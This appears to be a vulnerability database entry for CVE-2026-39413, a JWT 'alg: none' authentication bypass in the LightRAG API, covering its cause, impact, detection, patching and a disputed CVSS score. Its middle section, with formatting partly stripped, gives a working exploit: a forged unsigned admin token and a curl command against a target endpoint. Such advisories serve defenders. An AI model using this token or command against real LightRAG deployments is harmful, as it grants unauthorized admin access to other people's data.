
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-39413 is a JWT algorithm confusion vulnerability in the LightRAG API that allows attackers to forge authentication tokens by specifying 'alg': 'none' in the JWT header, bypassing authentication entirely. It affects the lightrag-hku pip package versions up to and including 1.4.13, with version 1.4.14 containing the fix. The vulnerability was published on April 7–8, 2026 via GitHub Advisory GHSA-8ffj-4hx4-9pgf. The official CVSS v3.1 score assigned by GitHub is 4.2 (Moderate), though independent researchers have argued the true severity is closer to 9.1 (Critical) due to the low exploitation barriers (Github Advisory, HKUDS Advisory).
The root cause is improper verification of cryptographic signatures (CWE-347), specifically in lightrag/api/auth.py at the validate_token method (line 128), where jwt.decode(token, self.secret, algorithms=[self.algorithm]) is called without explicitly excluding the 'none' algorithm. Because the PyJWT library historically accepted alg: none tokens as valid when not explicitly blocked, an attacker can craft a JWT with 'alg': 'none' in the header and an arbitrary payload — including elevated roles like admin — and submit it without any signature. The fix, applied in commit 728f2e5, adds an explicit check that rejects 'none' both at initialization and during token validation, and raises an error if the configured algorithm is insecure (HKUDS Advisory, Patch Commit).
Successful exploitation allows an attacker to impersonate any user, including administrators, without possessing valid credentials, gaining full unauthorized access to all protected LightRAG API endpoints. The primary impact is a high confidentiality breach, as the attacker can access all data and functionality exposed by the API under the forged identity. Integrity may also be at risk if the attacker uses admin-level access to modify knowledge graph data or system configurations within the LightRAG instance (Github Advisory, HKUDS Advisory).
A proof-of-concept exploit is publicly available in the GitHub security advisory, including a concrete crafted JWT token and a ready-to-run curl command demonstrating the attack (HKUDS Advisory). There is no current evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.023%, indicating a low (but non-zero) probability of exploitation in the near term. Notably, independent researchers have disputed the official CVSS score, arguing the actual attack requires no privileges, no user interaction, and low complexity — suggesting the real-world exploitability is significantly higher than the official rating implies (CVSS Dispute Issue).
lightrag-hku version ≤ 1.4.13, accessible over the network (e.g., via Shodan, Censys, or direct knowledge of deployment).'alg': 'none' and 'typ': 'JWT', then Base64url-encode it: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{'sub': 'admin', 'exp': <future_timestamp>, 'role': 'admin'}, and Base64url-encode it: eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.Authorization: Bearer header to any protected API endpoint:curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://<target>:8000/api/protected-endpointjwt.decode() call accepts the unsigned token as valid, granting full admin-level access to the API (HKUDS Advisory).Authorization: Bearer tokens where the JWT header decodes to {"alg": "none", "typ": "JWT"}; requests from unexpected source IPs to the LightRAG API port (default 8000).<header>.<payload>.); repeated access to admin-only endpoints from accounts not previously seen.Upgrade lightrag-hku to version 1.4.14 or later immediately, which explicitly rejects the 'none' algorithm both at initialization and during token validation (Patch Commit). As a workaround for environments that cannot upgrade immediately, manually patch lightrag/api/auth.py to hardcode the allowed algorithm list: payload = jwt.decode(token, self.secret, algorithms=['HS256']). Additionally, monitor authentication logs for tokens with missing or empty signatures and consider placing the API behind a network perimeter that restricts access to trusted clients only (Github Advisory).
A community researcher (karelorigino) filed a formal dispute on the GitHub Advisory Database, arguing that the official CVSS score of 4.2 (with AC:H, PR:H, UI:R) significantly underestimates the real-world exploitability, and proposed a corrected score of 9.1 (Critical) with AC:L, PR:N, UI:N — reflecting that the attack requires no privileges and no user interaction (CVSS Dispute Issue). The issue remains open as of the time of this report, and no official response from GitHub has been published.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."